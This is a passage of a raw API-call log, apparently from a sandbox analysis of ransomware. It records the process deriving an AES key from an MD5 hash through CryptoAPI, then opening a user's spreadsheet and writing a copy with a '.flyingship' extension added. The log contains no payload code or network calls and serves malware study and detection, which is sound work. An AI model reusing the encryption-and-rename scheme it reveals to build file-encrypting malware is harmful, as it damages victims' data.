lpsz="_CRYPT_STARTUP") returned 0xe [0173.888] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.888] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.888] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.888] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0173.888] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.888] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0173.888] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.888] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.888] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.889] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.889] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0173.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.889] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0173.890] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.890] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.890] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0173.890] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.890] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.890] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.890] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.890] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.890] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.890] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.890] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.891] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0173.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.891] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.891] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.891] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.891] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.891] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.891] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.891] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.891] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.891] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.892] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.892] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.892] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0173.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.892] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0173.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.892] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.892] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.892] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0173.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.892] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.892] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.893] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.893] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.893] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.893] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0173.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.893] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.893] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0173.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.893] CryptDestroyHash (hHash=0x90ae18) returned 1 [0173.893] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.893] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.893] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.893] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.893] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mv3nzu4vwv4hc.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.894] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.894] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0173.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0173.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.894] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0173.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0173.894] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0173.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0173.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0173.897] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0173.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0173.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0173.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0173.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0173.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.flyingship.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mv3nzu4vwv4hc.flyingship.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0173.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0173.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0173.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0173.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0173.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0173.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0173.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0173.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0173.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0173.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0173.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: 